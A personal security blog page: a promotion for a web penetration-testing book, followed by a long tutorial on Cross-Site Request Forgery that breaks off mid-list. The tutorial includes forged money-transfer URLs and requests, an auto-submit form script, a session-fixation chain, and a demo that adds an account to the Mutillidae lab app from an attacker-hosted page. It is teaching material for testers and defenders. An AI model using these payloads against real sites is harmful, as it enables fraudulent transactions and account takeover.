
28/05/2016

Hacker’s Elusive Thoughts The Web

Introduction

The reason for this blog post is to advertise my book. First of all, I would like to thank all the readers of my blog for their support and feedback, which helped make my articles better. After 12+ years in the penetration testing industry, the time has come for me to publish my book and transfer my knowledge to everyone who likes hacking and wants to learn as much as possible. At the end of this post you will also find a sample chapter.

About The Author

Gerasimos is a security consultant holding an MSc in Information Security, a CREST (CRT), a CISSP, an ITILv3, a GIAC GPEN and a GIAC GAWPT accreditation. Working alongside diverse and highly skilled teams, Gerasimos has been involved in countless comprehensive security tests and web application secure development engagements for global web applications and network platforms, counting more than 14 years in web application and application security architecture.

Progressing further in his career, Gerasimos has participated in various projects, providing leadership and accountability for assigned IT security projects, security assurance activities, technical security reviews and assessments, and has conducted validations and technical security testing against pre-production systems as part of overall validations.

Where From You Can Buy The Book

This book can be bought from Leanpub. Leanpub is a unique publishing platform that provides a way to write, publish and sell in-progress and completed ebooks. Anyone can sign up for free and use Leanpub's writing and publishing tools to produce a book and put it up for sale in our bookstore with one click. Authors are paid a royalty of 90% minus 50 cents per transaction with no constraints: they own their work and can sell it elsewhere for any price.

Authors and publishers can also upload books they have created using their own preferred book production processes and then sell them in the Leanpub bookstore, taking advantage of our high royalty rates and our in-progress publishing features.

For more information about buying the book, see: https://leanpub.com/hackerselusivethoughtstheweb

Why I Wrote This Book

I wrote this book to share my knowledge with anyone who wants to learn about Web Application security, understand how to formalize a Web Application penetration test and build a Web Application penetration test team.

The main goal of the book is to:

Spark some interesting ideas and help you build a comprehensive penetration testing framework, which you can easily use for your specific needs.
Help you understand why you need to write your own tools.
Help you gain a better understanding of some not so well documented attack techniques.

The main goal of the book is not to:

Provide you with a tool kit to perform Web Application penetration tests.
Provide you with complex attacks that you will not be able to understand.
Provide you with up to date information on the latest attacks.

Who This Book Is For

This book is written to help hacking enthusiasts become better and standardize their hacking methodologies and techniques, so as to know clearly what to do and why when testing Web Applications. This book will also be very helpful to the following professionals:

1. Web Application developers.
2. Professional Penetration Testers.
3. Web Application Security Analysts.
4. Information Security professionals.
5. Hiring Application Security Managers.
6. Managing Information Security Consultants.

How This Book Is Organised

Almost all chapters are written so that you do not need to read them sequentially in order to understand the concepts presented, although doing so is recommended. The following section gives you an overview of the book:

Chapter 1: Formalising Web Application Penetration Tests -

This chapter is a gentle introduction to the world of penetration testing, and attempts to give a realistic view of the current landscape. More specifically, it attempts to provide you with information on how to compose a Penetration Testing team and make the team as efficient as possible, and why writing tools and choosing the proper tools is important.

Chapter 2: Scanning With Class -

The second chapter focuses on helping you understand the difference between automated and manual scanning from the tester’s perspective. It will show you how to write custom scanning tools with the use of Python. This part of the book also contains chunks of Python code demonstrating how to write tools and design your own scanner.

Chapter 3: Payload Management -

This chapter focuses on explaining two things: a) what a Web payload is from a security perspective, and b) why it is important to obfuscate your payloads.

Chapter 4: Infiltrating Corporate Networks Using XXE -

This chapter focuses on explaining how to exploit and elevate an XML External Entity (XXE) Injection vulnerability. The main purpose of this chapter is not to show you how to exploit an XXE vulnerability, but to broaden your mind on how you can combine multiple vulnerabilities together to infiltrate your target, using an XXE vulnerability as an example.

Chapter 5: Phishing Like A Boss -

This chapter focuses on explaining how to perform phishing attacks using social engineering and Web vulnerabilities. The main purpose of this chapter is to help you broaden your mind on how to combine multiple security issues, to perform phishing attacks.

Chapter 6: SQL Injection Fuzzing For Fun And Profit -

This chapter focuses on explaining how to perform and automate SQL injection attacks through obfuscation using Python. It also explains why SQL injection attacks happen and what the risk is of having them in your web applications.

Sample Chapter Download

From the following link you will be able to download a sample chapter from my book:

Sample Book Download

26/12/2012

CSRFing the Web...

Introduction

Nowadays hacking, as already mentioned in my previous articles, has been industrialized, meaning that professional hackers are constantly hired to make money out of practically anything and therefore all Web Application vulnerabilities have to be understood and defeated.

This article is going to talk about what Cross Site Request Forgery (CSRF) is, explain how someone can perform a successful CSRF attack and describe how to amplify a CSRF attack (e.g. combine CSRF with other vulnerabilities). CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated (simplistically speaking). With a little help from social engineering (like sending a link via email/chat), an attacker may force the users of a web application to execute actions of the attacker's choosing.

A successful CSRF exploit can compromise end user data and operations in the case of a normal user. If the targeted end user is the administrator account, this can compromise the entire web application. More specifically, CSRF is a Web Application vulnerability that has to exploit more than one design flaw in order to be successful. The design flaws that a CSRF attack can take advantage of are:

Input Validation (e.g. Convert POST to GET)
Access Control (e.g. Session Fixation)
Privilege Assignment (e.g. Horizontal Privilege Escalation)

Note: Of course, depending on the situation, other types of vulnerabilities can be combined with a CSRF as part of a post exploitation process, such as SQL Injection (e.g. SQL inject the cookie and get access to a valid cookie repository in the database).

History of CSRF

CSRF vulnerabilities have been known and in some cases exploited since 2001. Because it is carried out from the user's IP address, some website logs might not have evidence of CSRF. Exploits are under-reported, at least publicly, and as of 2007 there are few well-documented examples. About 18 million users of eBay's Internet Auction Co. at Auction.co.kr in Korea lost personal information in February 2008. Customers of a bank in Mexico were attacked in early 2008 with an image tag in email. The link in the image tag changed the DNS entry for the bank in their ADSL router to point to a malicious website impersonating the bank.

Severity of CSRF

According to the United States Department Of Homeland Security the most dangerous CSRF vulnerability ranks in at the 909th most dangerous software bug ever found. Other severity metrics have been issued for CSRF vulnerabilities that result in remote code execution with root privileges as well as a vulnerability that can compromise a root certificate, which will completely undermine a public key infrastructure.

But what exactly is a CSRF

CSRF is a form of confused deputy attack. Imagine you’re a malcontent who wants to harm another person in a maximum security jail. You’re probably going to have a tough time reaching that person due to your lack of proper credentials. A potentially easier approach to accomplish your misdeed is to confuse a deputy to misuse his authority to commit the dastardly act on your behalf. That’s a much more effective strategy for causing mayhem.

In the case of a CSRF attack, the confused deputy is your browser. After you log into a website, the website will issue your browser an authentication token within a cookie (well, not always). With each subsequent HTTP POST or GET request sent, the cookie bound to the request lets the site know that you are authorized to take whatever action you’re taking. Here I am referring to a typical authentication and authorization scheme that most Web Applications use.

Suppose you visit a malicious website soon after visiting your bank website, or visit another website while being logged in to your bank web account. Your session on the previous site might still be valid (by the way, please invalidate your session by logging out before closing the browser). Thus, visiting a carefully crafted malicious website (perhaps you clicked on a spam link) could cause an HTML form post to the previous website. Your browser would send the authentication cookie back to that site and appear to be making a request on your behalf, even though you did not intend to do so.
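The confused deputy behaviour described above can be sketched with a toy model in Python. This is only an illustration under simplifying assumptions: `ToyBrowser`, the host names and the cookie value are hypothetical, and the model ignores browser-side restrictions such as the SameSite cookie attribute.

```python
from urllib.parse import urlsplit


class ToyBrowser:
    """Toy model of a browser cookie jar (not a real browser API)."""

    def __init__(self):
        self.cookies = {}  # destination host -> cookie string

    def store_cookie(self, host, cookie):
        self.cookies[host] = cookie

    def request(self, url, triggered_by):
        """Return the headers sent for `url`.

        `triggered_by` is the page that caused the request. It is accepted
        only to show that it plays no part in choosing the cookies.
        """
        host = urlsplit(url).hostname
        headers = {"Host": host}
        if host in self.cookies:
            # The cookie is attached based on the destination host alone.
            headers["Cookie"] = self.cookies[host]
        return headers


browser = ToyBrowser()
browser.store_cookie("bank.example", "session=abc123")

own = browser.request("http://bank.example/transfer",
                      triggered_by="http://bank.example/home")
forged = browser.request("http://bank.example/transfer",
                         triggered_by="http://evil.example/prize")

# The bank receives identical headers in both cases.
print(own == forged)
```

From the server's point of view the two requests look the same, which is why the cookie alone cannot tell it whether the user intended the action.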

Yes but what is a CSRF

A CSRF is a POST or GET HTTP request that, when sent to the vulnerable Web Application under certain conditions, can cause the Web Application to perform an action on behalf of the user. Meaningful CSRF attacks are those that can cause loss of Integrity, Confidentiality or Availability of the victim user's data. For example, if an e-Banking Web site is vulnerable to CSRF and the vulnerable function of the Web site is responsible for transferring money, then this is a CSRF with high severity and should be fixed.

This is an example of a simple CSRF:

http://www.vulnerable.com/?transferEuros=3000&maliciousUserAccount=9832487

Note: The link displayed above, when clicked, can authorize a malicious user to transfer 3000 euros from the victim user account to the malicious user account with id 9832487, assuming of course that no proper countermeasures have been taken.
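As a small aid, here is a Python sketch of how such a link is assembled as a well-formed URL, with the query string starting at `?` and parameters joined by `&`. The function name `build_transfer_link` is hypothetical; the parameter names are taken from the example link.

```python
from urllib.parse import urlencode, urlsplit, parse_qs


def build_transfer_link(base_url, amount, account_id):
    """Build the example link with a properly encoded query string."""
    query = urlencode({
        "transferEuros": amount,
        "maliciousUserAccount": account_id,
    })
    return f"{base_url}?{query}"


link = build_transfer_link("http://www.vulnerable.com/", 3000, 9832487)
print(link)

# Parsing the link back shows what the server would see as parameters.
print(parse_qs(urlsplit(link).query))
```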

The following diagram shows in more detail how this can happen:

Note: The diagram above shows the steps an attacker can take to exploit the vulnerability (step 4 designates the execution of the CSRF payload that performs the malicious action). It is very similar to a Cross Site Scripting attack scenario. An attacker sends an e-mail to an HTML-enabled e-mail client containing some sample images deliberately uploaded to a malicious server (controlled by the attacker), along with the malicious URL (or a malicious HTML form) that performs the CSRF function. The attacker then waits until the user opens the e-mail and downloads the images, or sets the e-mail to request a notification when the victim user reads it. He/she then watches the logs of the malicious image server or waits for a read receipt to arrive in his/her mailbox. After the image is downloaded or the read receipt is received, he/she will try to verify that the malicious function was executed. Another scenario would be to work out at what times users interact with the web site and time the attack accordingly before sending the malicious URL/HTML form.

The diagram above explains that the CSRF (meaning the vulnerable link described previously) can be injected into an HTML-enabled e-mail and be executed by a legitimate user. If the link (that is, the CSRF vulnerable link) is bound to the Web Application session (which it should be), then the victim user has to be logged in to the vulnerable Web Application for the attack to be successful. If the link is not bound to the Web Application session, then this is not a CSRF vulnerability; it is an Insecure Direct Object References vulnerability or a Failure to Restrict URL Access, both also described in the OWASP Top 10. Both vulnerabilities have to do with inappropriate access control and are unrelated to CSRF or CSRF-like vulnerabilities.

Now that you have a better grasp of what a CSRF attack is, I can be more technical and explain what a CSRF attack looks like in terms of HTTP requests. The link described above looks like this as an HTTP request:

GET /homepage/?transferEuros=3000&maliciousUserAccount=9832487 HTTP/1.1
Host: victim.com
Keep-Alive: timeout=15
Connection: Keep-Alive
Cookie: Authentication-Token
Accept: */*

Note: The vulnerable link, when clicked, will generate the GET request shown above and, if it is successful, the server will return a 200 HTTP response message saying that the transaction was completed successfully.

Explaining more what a CSRF is

The following diagram shows thoroughly how a CSRF can be exploited:

Step 1: Mallory sends a phishing email to Bob, inviting him to visit her web server in order, for example, to win an iPhone 5. She has already created a web page on her web server with a hidden request to the Web Application where Bob is logged in. She has added some buttons to lure the victim into clicking on her page to win the iPhone!

Step 2: Bob visits the page at Mallory's Web server. Maybe he is greedy, maybe not; either way he clicks on the button in order to win the iPhone!...

Step 3: The forged request is "legitimized" with Bob's logged-in session and is executed at the web application.

A real-world analogy would be the following: Mallory presents a bank cheque to Bob, and Bob puts his name and signature on it without examining what sum of money is written on the cheque. In the following attack scenario, we can see how a malicious user can add a user to a web application just by fooling a logged-in administrator into clicking on a link.

A different approach to CSRF

Now that I have explained a simple CSRF attack, it is time to explain a more advanced scenario on how to exploit a CSRF. Most of the time a CSRF is not easily recognizable, and that is why lots of people cannot identify a CSRF unless it is really obvious, just like the one I just described. A CSRF issue arises when:

A Web Application performs critical functions using GET HTTP requests (e.g. transferring money or adding users by just clicking a link).
The application does not distinguish between POST and GET requests (e.g. an HTML form POST request can easily be converted into a GET request, meaning a link).
The application has loose access control (e.g. it does not use AntiCSRF tokens, or is vulnerable to session fixation).
The application is vulnerable to Cross Site Scripting (e.g. someone can use JavaScript to forge a valid HTML POST form by using the XMLHTTP object along with an auto submit script).
The application passes the session in the URL along with the AntiCSRF token.
The session can be fixated and the AntiCSRF token is predictable or static.

Note: There are many more ways to perform a CSRF attack, but they are out of scope.
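Some of the conditions listed above can be spotted mechanically when reviewing captured requests. The following Python sketch flags a few of them for a single request. It is a rough heuristic under stated assumptions: the parameter names in `TOKEN_NAMES` and `SESSION_NAMES` are hypothetical examples, and the caller has to say whether the request is state changing.

```python
from urllib.parse import urlsplit, parse_qs

# Hypothetical parameter names; adjust them to the application under test.
TOKEN_NAMES = {"anticsrftoken", "csrf_token"}
SESSION_NAMES = {"sessionid", "jsessionid", "phpsessid"}


def csrf_indicators(method, url, body_params, state_changing):
    """Return a list of warning strings for one observed request."""
    query = {name.lower() for name in parse_qs(urlsplit(url).query)}
    body = {name.lower() for name in body_params}
    findings = []
    if state_changing and method.upper() == "GET":
        findings.append("critical function reachable via GET")
    if state_changing and not (TOKEN_NAMES & (query | body)):
        findings.append("no anti-CSRF token present")
    if TOKEN_NAMES & query:
        findings.append("anti-CSRF token exposed in URL")
    if SESSION_NAMES & query:
        findings.append("session identifier exposed in URL")
    return findings


findings = csrf_indicators(
    "GET",
    "http://www.vulnerable.com/?transferEuros=3000&maliciousUserAccount=9832487",
    {},
    state_changing=True,
)
print(findings)
```

A check like this only narrows down candidates; predictable tokens or session fixation still need manual testing.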

CSRF and POST to GET Interchange

It is common knowledge that when the Web Application does not distinguish between POST and GET requests, an attacker can convert a POST HTTP request to a GET HTTP request and generate a link equivalent to the one described previously. Burp Suite does that automatically from the Proxy tab: right-click the request and choose "Change request method" (it also recalculates the request size in the Content-Length header).

The attack just described can be enhanced by using an auto submit script such as this one:
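A minimal Python sketch of the conversion itself, assuming the POST body is ordinary form encoding (`application/x-www-form-urlencoded`). The helper name `post_to_get` and the `/transfer` path are hypothetical.

```python
from urllib.parse import parse_qsl, urlencode


def post_to_get(url, form_body):
    """Turn a form-encoded POST body into an equivalent GET URL."""
    params = parse_qsl(form_body, keep_blank_values=True)
    # Append to an existing query string if the URL already has one.
    separator = "&" if "?" in url else "?"
    return url + separator + urlencode(params)


get_url = post_to_get(
    "http://www.vulnerable.com/transfer",
    "transferEuros=3000&maliciousUserAccount=9832487",
)
print(get_url)
```

Whether the resulting link works depends entirely on the application accepting the parameters from the query string.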

<script language="JavaScript"> setTimeout('document.CSRFHtmlForm.submit()',5000); </script>

Note: A very useful tool is the CSRF PoC tool also found in Burp Suite. Burp Suite's CSRF PoC will generate a quick CSRF PoC for you (most of the time you will have to modify it to be realistic).

CSRF and Cross Site Scripting (XSS)

Cross-Site Scripting (XSS) attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.

An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. These scripts can even rewrite the content of the HTML page, and can also inject an HTML form with an auto submit script to execute the malicious CSRF. The idea is easy enough to understand that I won't give an example here.

Note1: You can see how an XSS vulnerability can be combined with a CSRF attack in the CSRF tool section (e.g. by also injecting the auto submit JavaScript code along with the CSRF).

Note2: Of course an XSS can be combined with a CSRF attack using the XMLHTTP and auto submit JavaScript features. A very good XSS (XMLHTTP)/CSRF example can be found here. The specific post explains an XSS/CSRF bug found in Gmail.

CSRF and Session Fixation

Session Fixation is an attack that permits an attacker to hijack a valid user session. The attack exploits a limitation in the way the vulnerable web application manages the session ID: when authenticating a user, it doesn’t assign a new session ID, making it possible to use an existing session ID. The attack consists of inducing a user to authenticate with a known session ID, and then hijacking the user-validated session through knowledge of that session ID. The attacker has to provide a legitimate Web application session ID and try to make the victim's browser use it.

The session fixation attack is a class of Session Hijacking. Classic session hijacking steals the established session between the client and the Web Server after the user logs in. The Session Fixation attack instead fixes an established session on the victim's browser, so the attack starts before the user logs in. There are several techniques to execute the attack; it depends on how the Web application deals with session tokens. Below are some of the most common techniques:
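The root cause can be illustrated with a toy session store in Python. This is a sketch with hypothetical names (`SessionStore`, `login_vulnerable`, `login_safe`), not the code of any particular framework: the vulnerable login keeps the pre-login session ID, while the safe one issues a fresh ID at authentication.

```python
import secrets


class SessionStore:
    """Toy in-memory session store."""

    def __init__(self):
        self.sessions = {}  # session_id -> username (None before login)

    def new_session(self):
        sid = secrets.token_hex(16)
        self.sessions[sid] = None
        return sid

    def login_vulnerable(self, sid, user):
        # Keeps the pre-login ID: whoever planted it now shares the session.
        self.sessions[sid] = user
        return sid

    def login_safe(self, sid, user):
        # Discards the pre-login ID and issues a fresh one.
        self.sessions.pop(sid, None)
        new_sid = secrets.token_hex(16)
        self.sessions[new_sid] = user
        return new_sid


store = SessionStore()

planted = store.new_session()           # ID obtained by the attacker
store.login_vulnerable(planted, "bob")  # victim logs in using that ID
print(store.sessions[planted])          # attacker's ID now maps to bob

planted = store.new_session()
fresh = store.login_safe(planted, "bob")
print(planted in store.sessions)        # the planted ID is no longer valid
```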

Session token in the URL argument: The Session ID is sent to the victim in a hyperlink and the victim accesses the site through the malicious URL.

Session token in a hidden form field: In this method, the victim must be tricked into authenticating to the target Web Server using a login form developed by the attacker. The form could be hosted on the evil web server or sent directly in an HTML-formatted e-mail.

Session ID in a cookie:

Client-side script:

Most browsers support the execution of client-side scripting. In this case, the aggressor could use a code injection attack such as XSS (Cross-site scripting) to insert malicious code in the hyperlink sent to the victim and fix a Session ID in the victim's cookie. Using document.cookie, the browser which executes the command becomes capable of fixing values inside the cookie that it will use to keep a session between the client and the Web Application.

<META> tag:

The <META> tag method is also considered a code injection attack; however, unlike an XSS attack, where undesirable scripts can be disabled or their execution denied, the attack using this method is much more efficient because it is impossible to disable the processing of these tags in browsers.

After describing the Session Fixation attack, I will explain the attack scenario described in the picture using a new chain of vulnerabilities (e.g. Session Fixation -> CSRF). An attacker sends an e-mail to an HTML-enabled e-mail client containing some sample images uploaded to a malicious server, along with the malicious URL that performs the CSRF function and this time is bound to the fixed session (by using one or more of the techniques described above). The attacker then waits until the user opens the e-mail and downloads the images, or sets the e-mail to request a notification when the victim user reads it. He/she then waits for the logs of the malicious image server to be updated or for a read receipt to arrive in his/her mailbox. After the image is downloaded (and he/she sees that from e.g. /www/var/apache.logs etc) or the read receipt is received, he/she will try to verify that the malicious function was executed.

The link with the fixated token will produce a GET HTTP request that looks like this:

GET /homepage/?transferEuros=3000&maliciousUserAccount=9832487 HTTP/1.1
Host: victim.com
Keep-Alive: timeout=15
Connection: Keep-Alive
Cookie: Fixated Session

Note1: Obviously a Session Fixation attack can have devastating results even without the use of a CSRF flaw. What I am saying here is that a Session Fixation combined with a CSRF attack amplifies the attack (e.g. the attacker will optimize his/her attack time frame by exploiting a chain of vulnerabilities rather than a single vulnerability).

Note2: Similar exploitation scenarios are possible when the web application does not provide the user with an authentication mechanism, e.g. open registration forms used for submitting credit card details.

CSRF and bad architecture design

Although this category might not be exactly a CSRF issue, it is still very similar to a CSRF attack. This type of attack refers to occasions where no proper random values are generated (based on user credentials), or where values are generated but do not have session-like behavior, e.g. lack of authorization, non-random CAPTCHA, lack of entity authentication etc. By building this type of behavior into your application you expose it to multiple types of attack.

CSRF and Clickjacking

Clickjacking, also known as a "UI redress attack", is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the top level page. Thus, the attacker is "hijacking" clicks meant for their page and routing them to another page, most likely owned by another application, domain, or both. Using a similar technique, keystrokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password to their email or bank account, but are instead typing into an invisible frame controlled by the attacker.

For example, imagine an attacker who builds a web site that has a button on it that says "click here for a free iPod". However, on top of that web page, the attacker has loaded an iframe with your vulnerable e-banking account, and lined up the "transfer money" button exactly on top of the "free iPod" button. The victim tries to click on the "free iPod" button but actually clicks on the invisible "transfer money" button. In essence, the attacker has "hijacked" the user's click, hence the name "Clickjacking". Again, the attack scenario would be similar to the ones described above, so there is no need for me to modify and explain the attack scenario again. What is interesting, though, is to show you an iframe that performs a CSRF attack.

Well an iframe that performs a CSRF attack would look something like that:
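A minimal illustration of such a page, generated here with a short Python helper. This is a sketch under assumptions rather than a reproduction of any specific listing: the function name `hidden_iframe_page`, the page text and the zero-size, hidden styling are all illustrative choices, and the target URL is the example link used earlier.

```python
from html import escape


def hidden_iframe_page(csrf_url):
    """Return an HTML page that loads `csrf_url` in an invisible iframe."""
    # Escape the URL so that '&' and quotes are valid inside the attribute.
    src = escape(csrf_url, quote=True)
    return (
        "<html><body>\n"
        "  <h1>Click here for a free iPod</h1>\n"
        f'  <iframe src="{src}" width="0" height="0" '
        'style="display:none"></iframe>\n'
        "</body></html>"
    )


page = hidden_iframe_page(
    "http://www.vulnerable.com/?transferEuros=3000&maliciousUserAccount=9832487"
)
print(page)
```

When the victim's browser renders the page, it requests the iframe source like any other resource, with the victim's cookies for that site attached.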

Note: You can see how beautiful this attack is and how simply and smoothly it can be implemented.

CSRF and Exposed Session Variables

Simply passing the session or other session variables in the URL, such as the AntiCSRF token, is asking for trouble. The Session Tokens (Cookie, SessionID, Hidden Field), if exposed, will usually enable an attacker to impersonate a victim and access the application illegitimately. As such, it is important that they are protected from eavesdropping at all times, particularly whilst in transit between the Client browser and the application servers.

The information here relates to how transport security applies to the transfer of sensitive Session ID data rather than data in general, and may be stricter than the caching and transport policies applied to the data served by the site. Using a personal proxy, it is possible to ascertain the following about each request and response:

Protocol used (e.g., HTTP vs. HTTPS)
HTTP Headers
Message Body (e.g., POST or page content)

Each time Session ID data is passed between the client and the server, the protocol, cache, and privacy directives and body should be examined. Transport security here refers to Session IDs passed in GET or POST requests, message bodies, or other means over valid HTTP requests. As you already understand stealing the Session ID and/or the AntiCSRF token might result in the attacker being able to form links such as the following one:

http://www.vulnerable.com/?sessionid=ligdlgkjdng&anticsrftoken=kjnsdldfksjdnk&transferEuros=3000&maliciousUserAccount=9832487

Note: The above information can be used to generate a link for a malicious user.

The attack scenario?

For my demo I chose the Mutillidae vulnerable web application, which can be found on OWASP's Vulnerable Apps VM, an intercepting proxy tool (I used PortSwigger's Burp Proxy; it is not essential, as a "View Source" from any browser works in most cases) and an Apache web server.

In the following picture you can see the main page of the Mutillidae web application as it can be browsed by any non-authenticated user.

In this web application any user can register an account, but our goal is to register the account with the administrator's privileges. Below is the "register user" page that any unauthenticated user can see.

If we view the source of the "Register Account" page, we can identify the forms (and therefore the POST request) that are sent to the web application. That data is then processed by the application and the user is created.
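Instead of reading the page source by eye, the forms can also be pulled out with a few lines of Python. The sketch below uses the standard library `html.parser`; the sample markup and its field names are hypothetical and only stand in for the real registration page.

```python
from html.parser import HTMLParser


class FormExtractor(HTMLParser):
    """Collect the action, method and named fields of each form on a page."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None  # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {
                "action": attrs.get("action", ""),
                "method": (attrs.get("method") or "get").upper(),
                "fields": [],
            }
            self.forms.append(self._current)
        elif (tag in ("input", "select", "textarea")
              and self._current is not None and attrs.get("name")):
            self._current["fields"].append(attrs["name"])

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


# Hypothetical markup standing in for the "Register Account" page.
sample = """
<form action="register.php" method="post">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Create Account">
</form>
"""

extractor = FormExtractor()
extractor.feed(sample)
print(extractor.forms)
```

The extracted action, method and field names are what is needed to rebuild the same request from another page.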

Now the attacker can create his own form on his web server and populate the HTML fields with the data of the user he wants to create on the system. (Note: no coding expertise is needed to create this HTML page!) In the following picture you can see the HTML page that he creates on his web server. He creates a user named "andrew", with password "qwerty".

Now he launches the web server (192.168.200.14) hosting this page. At this point, he needs the user's interaction. This could be accomplished, for example, by a phishing attack scenario: the victim receives an email inviting him to visit the attacker's page saying "click here to win an iPhone 5", or the attacker could place this "iPhone 5" message on the page he created!

Just imagine:

And this is how it will appear on the victim's web browser:

The victim, who is at the same time logged in with his account at the Mutillidae web application, is now tricked into clicking the button and submitting a register user form with the username and password set by the attacker.

Now user "andrew" can log in with the password set during the CSRF request.

At this point the CSRF attack scenario is complete. We successfully managed to exploit a CSRF vulnerability and add a user to the vulnerable web application.

The CASE studies for CSRF

This site here lists many popular web sites that were vulnerable to CSRF attacks. An interesting extract from the article follows:

"1. ING Direct (ingdirect.com)

Status: Fixed

We found a vulnerability on ING’s website that allowed additional accounts to be created on behalf of an arbitrary user. We were also able to transfer funds out of users’ bank accounts. We believe this is the first CSRF vulnerability to allow the transfer of funds from a financial institution. Specific details are described in our paper.

2. YouTube (youtube.com)

Status: Fixed

We discovered CSRF vulnerabilities in nearly every action a user could perform on YouTube. An attacker could have added videos to a user’s "Favorites," added himself to a user’s "Friend" or "Family" list, sent arbitrary messages on the user’s behalf, flagged videos as inappropriate, automatically shared a video with a user’s contacts, subscribed a user to a "channel" (a set of videos published by one person or group) and added videos to a user’s "QuickList" (a list of videos a user intends to watch at a later point). Specific details are described in our paper.

3. MetaFilter (metafilter.com)

Status: Fixed

A vulnerability existed on Metafilter that allowed an attacker to take control of a user’s account. A forged request could be used to set a user’s email address to the attacker’s address. A second forged request could then be used to activate the "Forgot Password" action, which would send the user’s password to the attacker’s email address. Specific details are described in our paper.

(MetaFilter fixed this vulnerability in less than two days. We appreciate the fact that MetaFilter contacted us to let us know the problem had been fixed.)

4. The New York Times (nytimes.com)

Status: Not Fixed. We contacted the New York Times in September, 2007. ~~As of September 24, 2008, this vulnerability still exists.~~ This problem has been fixed."

Note: You can see from the above extract that CSRF issues are very common these days.

Tools for CSRFing the Web

The Burp Proxy tool (the Pro version of course) can be used to generate a proof-of-concept (PoC) cross-site request forgery (CSRF) attack for a given request. To access this function, select a URL or HTTP request anywhere within Burp, and choose "Generate CSRF PoC" within "Engagement tools" in the context menu.

When you execute this function, Burp shows the full request you selected in the top panel, and the generated CSRF HTML in the lower panel. The HTML uses a form with a suitable action URL, encoding type and parameters, to generate the required request when the browser submits the form. You can edit the request manually, and click the "Regenerate" button to regenerate the CSRF HTML based on the updated request.

You can test the effectiveness of the generated PoC in your browser, using the "Test in browser" button. When you select this option, Burp gives you a unique URL that you can paste into your browser (configured to use the current instance of Burp as its proxy). The resulting browser request is served by Burp with the currently displayed HTML, and you can then determine whether the PoC is effective by monitoring the resulting request(s) that are made through the Proxy.

Some points should be noted regarding form encoding:

    •    Some requests (e.g. those containing raw XML or JSON) have bodies that can only be generated using a form with plain text encoding. With each type of form submission using the POST method, the browser will include a Content-Type header indicating the encoding type of the form that generated the request. In some cases, although the message body exactly matches that required for the attack request, the application may reject the request due to an unexpected Content-Type header. Such CSRF-like conditions might not be practically exploitable. Burp will display a warning in the CSRF PoC generator if this is liable to occur.

    •    If you manually select a form encoding type that cannot be used to produce the required request, Burp will generate a best effort at a PoC and will display a warning.

    •    If the CSRF PoC generator is using plain text encoding, then the request body must contain an equals character in order for Burp to generate an HTML form which results in that exact body. If the original request does not contain an equals character, then you may be able to introduce one into a suitable position in the request, without affecting the server's processing of it.

CSRF PoC Options

The following options are available:

    •    Include auto-submit script - Using this option causes Burp to include a small script in the HTML that causes a JavaScript-enabled browser to automatically submit the form (causing the CSRF request) when the page is loaded.

    •    Form encoding - This option lets you specify the type of encoding to use in the form that generates the CSRF request. The "Auto" option is generally preferred, and causes Burp to select the most appropriate encoding capable of generating the required request.
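To make the form encoding notes and the two options above more concrete, here is a minimal Python sketch of what such a PoC generator could look like. It is not Burp's implementation; the function names, the bank.example URL and the sample body are all made up for illustration. It only shows the idea: a hidden form with a chosen encoding type, an optional auto-submit script, and the "equals character" trick for plain text bodies.

```python
import html


def build_csrf_poc(action, fields, enctype="application/x-www-form-urlencoded",
                   auto_submit=True):
    """Return an HTML page whose form reproduces a POST request.

    action and fields are hypothetical inputs chosen for illustration.
    """
    inputs = "\n".join(
        '    <input type="hidden" name="{}" value="{}">'.format(
            html.escape(name, quote=True), html.escape(value, quote=True))
        for name, value in fields
    )
    # Optional script that submits the form as soon as the page loads.
    script = ("  <script>document.forms[0].submit();</script>\n"
              if auto_submit else "")
    return (
        "<html>\n  <body>\n"
        '  <form action="{}" method="POST" enctype="{}">\n{}\n'
        '    <input type="submit" value="Submit request">\n'
        "  </form>\n{}  </body>\n</html>\n"
    ).format(html.escape(action, quote=True), enctype, inputs, script)


def split_plain_text_body(body):
    """Split a raw body at its first '=' into one (name, value) pair.

    With text/plain encoding the browser sends name=value without URL
    encoding, so the pair recombines into the original body (browsers
    append a line break after it). A body without '=' cannot be rebuilt
    this way.
    """
    if "=" not in body:
        raise ValueError("body needs an equals character for text/plain forms")
    name, value = body.split("=", 1)
    return [(name, value)]


if __name__ == "__main__":
    json_body = '{"to": "attacker", "note": "x=y"}'  # made-up JSON request body
    print(build_csrf_poc("https://bank.example/transfer",
                         split_plain_text_body(json_body),
                         enctype="text/plain"))
```

Whether the target accepts the resulting text/plain Content-Type header is a separate question, as noted in the first bullet of the form encoding points.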

The following picture shows a screen shot from Burp CSRF PoC tool while doing right click on an intercepted request:

The following picture shows the generated CSRF PoC:

Note: Right-click the intercepted HTTP GET or POST request and click CSRF PoC. If the web application accepts GET and POST interchangeably, the PoC should work with either method.

Prevention Measures That Do NOT Work

Using a Secret Cookie:

Remember that all cookies, even the secret ones, will be submitted with every request. All authentication tokens will be submitted regardless of whether or not the end-user was tricked into submitting the request. Furthermore, session identifiers are simply used by the application container to associate the request with a specific session object. The session identifier does not verify that the end-user intended to submit the request.

Only Accepting POST Requests:

Applications can be developed to only accept POST requests for the execution of business logic. The misconception is that since the attacker cannot construct a malicious link, a CSRF attack cannot be executed. Unfortunately, this logic is incorrect. There are numerous methods in which an attacker can trick a victim into submitting a forged POST request, such as a simple form hosted in an attacker's Website with hidden values. This form can be triggered automatically by JavaScript or can be triggered by the victim who thinks the form will do something else.

Multi-Step Transactions:

Multi-Step transactions are not an adequate prevention of CSRF. As long as an attacker can predict or deduce each step of the completed transaction, then CSRF is possible.

URL Rewriting:

